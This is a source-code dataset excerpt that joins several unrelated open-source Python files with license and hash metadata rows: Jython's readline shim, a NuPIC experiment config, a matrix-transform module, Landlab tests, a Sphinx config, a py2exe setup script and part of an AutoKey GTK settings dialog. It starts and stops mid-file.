class PowerlineClass(PowerlineClass):
@staticmethod
def get_config_paths():
return ['/']
pl = PowerlineClass(
config_loader=TestConfigLoader(
_helpers=helpers,
run_once=kwargs.get('run_once')
),
**kwargs
)
pl._watcher = pl.config_loader.watcher
return pl
def swap_attributes(config, powerline_module):
return replace_attr(powerline_module, 'os', Args(
path=Args(
isfile=lambda path: path.lstrip('/').replace('.json', '') in config,
join=os.path.join,
expanduser=lambda path: path,
realpath=lambda path: path,
dirname=os.path.dirname,
),
environ={},
))
def add_watcher_events(p, *args, **kwargs):
if isinstance(p._watcher, TestWatcher):
p._watcher._reset(args)
while not p._will_create_renderer():
sleep(kwargs.get('interval', 0.1))
if not kwargs.get('wait', True):
return
| mit | 2,095,903,029,881,976,000 | 22.052174 | 84 | 0.687476 | false |
thomashaw/SecGen | modules/utilities/unix/audit_tools/ghidra/files/release/Ghidra/Features/Python/data/jython-2.7.1/Lib/readline.py | 13 | 5659 | import os.path
import sys
from warnings import warn
try:
_console = sys._jy_console
_reader = _console.reader
except AttributeError:
raise ImportError("Cannot access JLine2 setup")
try:
# jarjar-ed version
from org.python.jline.console.history import MemoryHistory
except ImportError:
# dev version from extlibs
from jline.console.history import MemoryHistory
__all__ = ['add_history', 'clear_history', 'get_begidx', 'get_completer',
'get_completer_delims', 'get_current_history_length',
'get_endidx', 'get_history_item', 'get_history_length',
'get_line_buffer', 'insert_text', 'parse_and_bind',
'read_history_file', 'read_init_file', 'redisplay',
'remove_history_item', 'set_completer', 'set_completer_delims',
'set_history_length', 'set_pre_input_hook', 'set_startup_hook',
'write_history_file']
_history_list = None
# The need for the following warnings should go away once we update
# JLine. Choosing ImportWarning as the closest warning to what is
# going on here, namely that this functionality is not yet available on
# Jython.
class NotImplementedWarning(ImportWarning):
"""Not yet implemented by Jython"""
class SecurityWarning(ImportWarning):
"""Security manager prevents access to private field"""
def parse_and_bind(string):
pass
def get_line_buffer():
return str(_reader.cursorBuffer.buffer)
def insert_text(string):
_reader.putString(string)
def read_init_file(filename=None):
warn("read_init_file: %s" % (filename,), NotImplementedWarning, "module", 2)
def read_history_file(filename="~/.history"):
expanded = os.path.expanduser(filename)
with open(expanded) as f:
_reader.history.load(f)
def write_history_file(filename="~/.history"):
expanded = os.path.expanduser(filename)
with open(expanded, 'w') as f:
for line in _reader.history.entries():
f.write(line.value().encode("utf-8"))
f.write("\n")
def clear_history():
_reader.history.clear()
def add_history(line):
_reader.history.add(line)
def get_history_length():
return _reader.history.maxSize
def set_history_length(length):
_reader.history.maxSize = length
def get_current_history_length():
return _reader.history.size()
def get_history_item(index):
# JLine indexes from 0 while readline indexes from 1 (at least in test_readline)
if index>0:
return _reader.history.get(index-1)
else:
return None
def remove_history_item(pos):
_reader.history.remove(pos)
def replace_history_item(pos, line):
_reader.history.set(pos, line)
def redisplay():
_reader.redrawLine()
def set_startup_hook(function=None):
_console.startupHook = function
def set_pre_input_hook(function=None):
warn("set_pre_input_hook %s" % (function,), NotImplementedWarning, stacklevel=2)
_completer_function = None
def set_completer(function=None):
"""set_completer([function]) -> None
Set or remove the completer function.
The function is called as function(text, state),
for state in 0, 1, 2, ..., until it returns a non-string.
It should return the next possible completion starting with 'text'."""
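    # Illustrative sketch (hypothetical word list, not part of this module):
    #     words = ['spam', 'span', 'spawn']
    #     def complete(text, state):
    #         matches = [w for w in words if w.startswith(text)]
    #         return matches[state] if state < len(matches) else None
    #     set_completer(complete)
    # complete() is then called with state = 0, 1, 2, ... and returns None
    # once the matches are exhausted.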
global _completer_function
_completer_function = function
def complete_handler(buffer, cursor, candidates):
start = _get_delimited(buffer, cursor)[0]
delimited = buffer[start:cursor]
try:
sys.ps2
have_ps2 = True
except AttributeError:
have_ps2 = False
if (have_ps2 and _reader.prompt == sys.ps2) and (not delimited or delimited.isspace()):
        # Insert tab (as expanded to 4 spaces), but only if the
        # preceding text is whitespace/empty and we are in console
        # continuation; this is a planned feature for Python 3 per
# http://bugs.python.org/issue5845
#
        # Ideally this would not expand tabs, in case of mixed
        # copy&paste of tab-indented code; however, JLine2 gets
        # confused about the cursor position during certain, but not
        # all, subsequent edits if the tab is backspaced
candidates.add(" " * 4)
return start
# TODO: if there are a reasonably large number of completions
# (need to get specific numbers), CPython 3.4 will show a
# message like so:
# >>>
# Display all 186 possibilities? (y or n)
# Currently Jython arbitrarily limits this to 100 and displays them
for state in xrange(100):
completion = None
try:
completion = function(delimited, state)
except:
pass
if completion:
candidates.add(completion)
else:
break
return start
_reader.addCompleter(complete_handler)
def get_completer():
return _completer_function
def _get_delimited(buffer, cursor):
start = cursor
for i in xrange(cursor-1, -1, -1):
if buffer[i] in _completer_delims:
break
start = i
return start, cursor
def get_begidx():
return _get_delimited(str(_reader.cursorBuffer.buffer), _reader.cursorBuffer.cursor)[0]
def get_endidx():
return _get_delimited(str(_reader.cursorBuffer.buffer), _reader.cursorBuffer.cursor)[1]
def set_completer_delims(string):
global _completer_delims, _completer_delims_set
_completer_delims = string
_completer_delims_set = set(string)
def get_completer_delims():
return _completer_delims
set_completer_delims(' \t\n`~!@#$%^&*()-=+[{]}\\|;:\'",<>/?')
| gpl-3.0 | 4,725,312,246,557,732,000 | 29.755435 | 95 | 0.646934 | false |
gamahead/nupic | tests/swarming/nupic/swarming/experiments/input_predicted_field/description.py | 8 | 14110 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupicengine/frameworks/opf/expGenerator/ExpGenerator.pyc'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer
)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [ (u'timestamp', 'first'),
(u'consumption', 'sum'),
],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalMultiStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# 'encoders': {'field1': {'fieldname': 'field1', 'n':100,
# 'name': 'field1', 'type': 'AdaptiveScalarEncoder',
# 'w': 21}}
#
'encoders': {
'consumption': {
'clipInput': True,
'fieldname': u'consumption',
'n': 100,
'name': u'consumption',
'type': 'AdaptiveScalarEncoder',
'w': 21},
'address': {
'fieldname': u'address',
'n': 300,
'name': u'address',
'type': 'SDRCategoryEncoder',
'w': 21},
'gym': {
'fieldname': u'gym',
'n': 100,
'name': u'gym',
'type': 'SDRCategoryEncoder',
'w': 21},
'timestamp_dayOfWeek': {
'dayOfWeek': (7, 3),
'fieldname': u'timestamp',
'name': u'timestamp_dayOfWeek',
'type': 'DateEncoder'},
'timestamp_timeOfDay': {
'fieldname': u'timestamp',
'name': u'timestamp_timeOfDay',
'timeOfDay': (7, 8),
'type': 'DateEncoder'},
'_classifierInput': {
'name': u'_classifierInput',
'fieldname': u'consumption',
'classifierOnly': True,
'type': 'AdaptiveScalarEncoder',
'clipInput': True,
'n': 100,
'w': 21},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys is the desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : { u'days': 0, u'hours': 0},
},
'spEnable': True,
'spParams': {
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses. At initialization time, we will
# choose potentialPct * (2*potentialRadius+1)^2
'potentialPct': 0.5,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.1,
'synPermInactiveDec': 0.01,
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
#
# TODO: need better explanation
'newSynapseCount': 20,
# Maximum number of synapses per segment
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSegmentsPerCell': 128,
# Initial Permanence
# TODO: need better explanation
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'anomalyParams': { u'anomalyCacheRecords': None,
u'autoDetectThreshold': None,
u'autoDetectWaitRecords': None},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupic/frameworks/opf/jsonschema/stream_def.json.
#
'dataset' : {
u'info': u'test_hotgym',
u'streams': [ { u'columns': [u'*'],
u'info': u'test data',
u'source': u'file://swarming/test_data.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
'iterationCount' : -1,
# A dictionary containing all the supplementary parameters for inference
"inferenceArgs":{u'predictedField': u'consumption', u'predictionSteps': [1]},
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'consumption', metric='multiStep',
inferenceElement='multiStepBestPredictions',
params={'window': 1000, 'steps': [1], 'errorMetric': 'altMAPE'}),
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| gpl-3.0 | 1,349,712,527,599,715,300 | 36.229551 | 117 | 0.586889 | false |
VanHulleOne/DogBone | matrixTrans.py | 1 | 2048 | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 07 17:44:20 2016
A module to store operations related to matrix transformations.
@author: Luke
"""
import Point as p
import Line as l
import constants as c
import numpy
import math
def translateMatrix(shiftX, shiftY, shiftZ=0):
transMatrix = numpy.identity(4)
transMatrix[c.X][3] = shiftX
transMatrix[c.Y][3] = shiftY
transMatrix[c.Z][3] = shiftZ
return transMatrix
def rotateMatrix(angle, point=None):
if point is None:
point = p.Point(0,0)
toOrigin = translateMatrix(-point.x, -point.y)
rotateMatrix = numpy.identity(4)
rotateMatrix[c.X][0] = math.cos(angle)
rotateMatrix[c.Y][0] = math.sin(angle)
rotateMatrix[c.X][1] = -rotateMatrix[c.Y][0]
rotateMatrix[c.Y][1] = rotateMatrix[c.X][0]
transBack = translateMatrix(point.x, point.y)
transMatrix = numpy.dot(transBack, numpy.dot(rotateMatrix, toOrigin))
return transMatrix
def mirrorMatrix(axis):
transMatrix = numpy.identity(4)
if type(axis) is l.Line:
mList = []
mList.append(translateMatrix(-axis.start.x, -axis.start.y)) #toOrigin
angle = math.asin((axis.end.y-axis.start.y)/axis.length) #angle
# print 'Angle: %.2f'%(angle/(2*math.pi)*360)
mList.append(rotateMatrix(-angle)) #rotate to X-axis
xMirror = numpy.identity(4)
xMirror[c.Y][c.Y] = -1
mList.append(xMirror) #mirror about X axis
mList.append(rotateMatrix(angle)) #rotate back
mList.append(translateMatrix(axis.start.x, axis.start.y)) #translate back
for matrix in mList:
transMatrix = numpy.dot(matrix, transMatrix)
return transMatrix
if(axis == c.X):
transMatrix[c.Y][c.Y] *= -1
else:
transMatrix[c.X][c.X] *= -1
return transMatrix
def combineTransformations(matrixList):
transMatrix = numpy.identity(4)
for matrix in matrixList:
transMatrix = numpy.dot(matrix, transMatrix)
return transMatrix
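# Illustrative usage (hypothetical values, assuming the axis constants map to
# the usual 0/1/2 indices): rotating 90 degrees about the origin and then
# shifting by (5, 0),
#     m = combineTransformations([rotateMatrix(math.pi / 2),
#                                 translateMatrix(5, 0)])
# maps the homogeneous point [1, 0, 0, 1] to approximately [5, 1, 0, 1].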
| mit | -7,767,282,250,371,348,000 | 31.015625 | 90 | 0.637695 | false |
csherwood-usgs/landlab | landlab/grid/tests/test_raster_funcs/test_is_on_grid.py | 6 | 1700 | import numpy as np
from numpy.testing import assert_array_equal
from nose import with_setup
from nose.tools import (assert_equal, assert_raises)
try:
from nose.tools import assert_is
except ImportError:
from landlab.testing.tools import assert_is
from landlab.grid import raster_funcs as rfuncs
from landlab import RasterModelGrid
def test_with_arrays():
"""Test with arrays as arg."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
coords = (np.array([1., -1.]), np.array([1., -1.]))
assert_array_equal(rfuncs.is_coord_on_grid(rmg, coords),
np.array([True, False]))
def test_just_inside():
"""Test with points just inside the grid."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
assert_equal(rfuncs.is_coord_on_grid(rmg, (0., 4.)), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (8. - 1e-12, 4.)), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 0.)), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 6. - 1e-12)), True)
def test_just_outside():
"""Test with points just outside the grid."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
assert_equal(rfuncs.is_coord_on_grid(rmg, (0. - 1e-12, 4.)), False)
assert_equal(rfuncs.is_coord_on_grid(rmg, (8., 4.)), False)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 0. - 1e-12)), False)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 6.)), False)
def test_just_x():
    """Test checking whether points are within the x bounds only."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
assert_equal(rfuncs.is_coord_on_grid(rmg, (4., 1.e6), axes=(1, )), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (-1., 1.), axes=(1, )), False)
| mit | -5,533,083,016,274,396,000 | 35.170213 | 76 | 0.634706 | false |
sfermigier/flask-linktester | docs/conf.py | 1 | 1823 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.append(os.path.abspath('_themes'))
# Reused
from setup import VERSION
NAME = "Flask-LinkTester"
YEAR = "2012-2017"
AUTHOR = "Stefane Fermigier"
# -- General configuration -----------------------------------------------------
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = NAME
copyright = u"%s, %s" % (YEAR, AUTHOR)
version = VERSION
release = VERSION
exclude_patterns = ['_build']
html_theme = 'flask_small'
html_theme_path = ['_themes']
html_static_path = ['_static']
html_theme_options = {
#'index_logo': 'flask-testing.png', # TODO
'github_fork': 'sfermigier/flask-linktester'
}
htmlhelp_basename = 'flask-linktesterdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
latex_elements = {
'papersize': 'a4',
}
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', '%s.tex' % NAME.lower(), u'%s Documentation' % NAME,
AUTHOR, 'manual'),
]
# -- Options for manual page output --------------------------------------------
man_pages = [
('index', str(NAME.lower()), u'%s Documentation' % NAME, [AUTHOR], 1)
]
| bsd-3-clause | -4,495,656,542,323,691,500 | 26.208955 | 80 | 0.620954 | false |
nstockton/barcode-finder | setup.py | 1 | 4474 | # -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import glob
import os
import shutil
import sys
import zlib
from distutils.core import setup
import py2exe
from constants import APP_NAME, APP_VERSION, APP_AUTHOR
# ModuleFinder can't handle runtime changes to __path__, but win32com uses them
try:
# py2exe 0.6.4 introduced a replacement modulefinder.
# This means we have to add package paths there, not to the built-in one.
# If this new modulefinder gets integrated into Python, then we might be able to revert this some day.
# if this doesn't work, try import modulefinder
try:
import py2exe.mf as modulefinder
except ImportError:
import modulefinder
import win32com, sys
for p in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", p)
for extra in ["win32com.shell"]:
__import__(extra)
m = sys.modules[extra]
for p in m.__path__[1:]:
modulefinder.AddPackagePath(extra, p)
except ImportError:
pass
# Remove the build folder if it exists.
shutil.rmtree("build", ignore_errors=True)
# Do the same for the dist folder if it exists.
shutil.rmtree("dist", ignore_errors=True)
# If run without args, build executables, in quiet mode.
if len(sys.argv) == 1:
sys.argv.append("py2exe")
sys.argv.append("-q")
class Target(object):
def __init__(self, **kw):
self.__dict__.update(kw)
# for the versioninfo resources
self.version = APP_VERSION
self.company_name = ""
self.copyright = APP_AUTHOR
self.name = APP_NAME
# The manifest will be inserted as a resource into the executable. This gives the controls the Windows XP appearance (if run on XP ;-)
manifest_template = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.0.0.0"
processorArchitecture="x86"
name="%(prog)s"
type="win32"
/>
<description>%(prog)s Program</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false">
</requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.VC90.CRT"
version="9.0.21022.8"
processorArchitecture="x86"
publicKeyToken="1fc8b3b9a1e18e3b">
</assemblyIdentity>
</dependentAssembly>
</dependency>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
"""
RT_MANIFEST = 24
program = Target(
# used for the versioninfo resource
description = "%s V%s" % (APP_NAME, APP_VERSION),
# what to build
script = "%s.pyw" % APP_NAME,
other_resources = [(RT_MANIFEST, 1, manifest_template % dict(prog=APP_NAME))],
icon_resources = [(1, "%s.ico" % APP_NAME)],
dest_base = APP_NAME
)
excludes = [
"_ssl",
"_gtkagg",
"_tkagg",
"bsddb",
"curses",
"email",
"pywin.debugger",
"pywin.debugger.dbgcon",
"pywin.dialogs",
"tcl",
"Tkconstants",
"Tkinter",
"pdbunittest",
"difflib",
"pyreadline",
"optparse",
"pickle",
"calendar",
]
packages = [
"xml.etree",
"json",
"encodings.utf_8",
"encodings.ascii",
"encodings.latin_1",
"encodings.hex_codec"
]
dll_excludes = [
"libgdk-win32-2.0-0.dll",
"libgobject-2.0-0.dll",
"tcl84.dll",
"tk84.dll",
"MSVCP90.dll",
"mswsock.dll",
"powrprof.dll",
"python23.dll",
"_sre.pyd",
"_winreg.pyd",
"unicodedata.pyd",
"zlib.pyd",
"wxc.pyd",
"wxmsw24uh.dll",
"w9xpopen.exe",
]
setup(
options = {
"py2exe": {
"bundle_files": True,
"ascii": True,
"compressed": True,
"optimize": 2,
"excludes": excludes,
"packages": packages,
"dll_excludes": dll_excludes,
}
},
zipfile = None,
windows = [program],
data_files = [
("sounds", glob.glob("sounds\\*")),
("speech_libs", glob.glob("speech_libs\\*")),
],
)
# Remove the build folder since we no longer need it.
shutil.rmtree("build", ignore_errors=True)
| mpl-2.0 | 1,676,056,079,268,492,300 | 21.170984 | 134 | 0.65653 | false |
mromanoff/schedule-appointment | client/vendor/bower_components/jasmine/lib/jasmine-core/core.py | 163 | 1481 | import pkg_resources
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
class Core(object):
@classmethod
def js_package(cls):
return __package__
@classmethod
def css_package(cls):
return __package__
@classmethod
def image_package(cls):
return __package__ + ".images"
@classmethod
def js_files(cls):
js_files = sorted(list(filter(lambda x: '.js' in x, pkg_resources.resource_listdir(cls.js_package(), '.'))))
# jasmine.js needs to be first
js_files.insert(0, 'jasmine.js')
# boot needs to be last
js_files.remove('boot.js')
js_files.append('boot.js')
return cls._uniq(js_files)
@classmethod
def css_files(cls):
return cls._uniq(sorted(filter(lambda x: '.css' in x, pkg_resources.resource_listdir(cls.css_package(), '.'))))
@classmethod
def favicon(cls):
return 'jasmine_favicon.png'
@classmethod
def _uniq(self, items, idfun=None):
# order preserving
if idfun is None:
def idfun(x): return x
seen = {}
result = []
for item in items:
marker = idfun(item)
# in old Python versions:
# if seen.has_key(marker)
# but in new ones:
if marker in seen:
continue
seen[marker] = 1
result.append(item)
return result | mit | 3,760,282,436,255,420,400 | 23.7 | 119 | 0.568535 | false |
linfuzki/autokey | src/lib/gtkui/settingsdialog.py | 46 | 9114 | # -*- coding: utf-8 -*-
# Copyright (C) 2011 Chris Dekter
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os, sys
from gi.repository import Gtk
from autokey.configmanager import *
from autokey import iomediator, model, common
from dialogs import GlobalHotkeyDialog
import configwindow
DESKTOP_FILE = "/usr/share/applications/autokey-gtk.desktop"
AUTOSTART_DIR = os.path.expanduser("~/.config/autostart")
AUTOSTART_FILE = os.path.join(AUTOSTART_DIR, "autokey-gtk.desktop")
ICON_NAME_MAP = {
_("Light") : common.ICON_FILE_NOTIFICATION,
_("Dark") : common.ICON_FILE_NOTIFICATION_DARK
}
ICON_NAME_LIST = []
class SettingsDialog:
KEY_MAP = GlobalHotkeyDialog.KEY_MAP
REVERSE_KEY_MAP = GlobalHotkeyDialog.REVERSE_KEY_MAP
def __init__(self, parent, configManager):
builder = configwindow.get_ui("settingsdialog.xml")
self.ui = builder.get_object("settingsdialog")
builder.connect_signals(self)
self.ui.set_transient_for(parent)
self.configManager = configManager
# General Settings
self.autoStartCheckbox = builder.get_object("autoStartCheckbox")
self.promptToSaveCheckbox = builder.get_object("promptToSaveCheckbox")
self.showTrayCheckbox = builder.get_object("showTrayCheckbox")
self.allowKbNavCheckbox = builder.get_object("allowKbNavCheckbox")
self.allowKbNavCheckbox.hide()
self.sortByUsageCheckbox = builder.get_object("sortByUsageCheckbox")
self.enableUndoCheckbox = builder.get_object("enableUndoCheckbox")
self.iconStyleCombo = Gtk.ComboBoxText.new()
hbox = builder.get_object("hbox4")
hbox.pack_start(self.iconStyleCombo, False, True, 0)
hbox.show_all()
for key, value in ICON_NAME_MAP.items():
self.iconStyleCombo.append_text(key)
ICON_NAME_LIST.append(value)
self.iconStyleCombo.set_sensitive(ConfigManager.SETTINGS[SHOW_TRAY_ICON])
self.iconStyleCombo.set_active(ICON_NAME_LIST.index(ConfigManager.SETTINGS[NOTIFICATION_ICON]))
self.autoStartCheckbox.set_active(os.path.exists(AUTOSTART_FILE))
self.promptToSaveCheckbox.set_active(ConfigManager.SETTINGS[PROMPT_TO_SAVE])
self.showTrayCheckbox.set_active(ConfigManager.SETTINGS[SHOW_TRAY_ICON])
#self.allowKbNavCheckbox.set_active(ConfigManager.SETTINGS[MENU_TAKES_FOCUS])
self.sortByUsageCheckbox.set_active(ConfigManager.SETTINGS[SORT_BY_USAGE_COUNT])
self.enableUndoCheckbox.set_active(ConfigManager.SETTINGS[UNDO_USING_BACKSPACE])
# Hotkeys
self.showConfigDlg = GlobalHotkeyDialog(parent, configManager, self.on_config_response)
self.toggleMonitorDlg = GlobalHotkeyDialog(parent, configManager, self.on_monitor_response)
self.configKeyLabel = builder.get_object("configKeyLabel")
self.clearConfigButton = builder.get_object("clearConfigButton")
self.monitorKeyLabel = builder.get_object("monitorKeyLabel")
self.clearMonitorButton = builder.get_object("clearMonitorButton")
self.useConfigHotkey = self.__loadHotkey(configManager.configHotkey, self.configKeyLabel,
self.showConfigDlg, self.clearConfigButton)
self.useServiceHotkey = self.__loadHotkey(configManager.toggleServiceHotkey, self.monitorKeyLabel,
self.toggleMonitorDlg, self.clearMonitorButton)
# Script Engine Settings
self.userModuleChooserButton = builder.get_object("userModuleChooserButton")
if configManager.userCodeDir is not None:
self.userModuleChooserButton.set_current_folder(configManager.userCodeDir)
if configManager.userCodeDir in sys.path:
sys.path.remove(configManager.userCodeDir)
def on_save(self, widget, data=None):
if self.autoStartCheckbox.get_active():
if not os.path.exists(AUTOSTART_FILE):
try:
inFile = open(DESKTOP_FILE, 'r')
outFile = open(AUTOSTART_FILE, 'w')
contents = inFile.read()
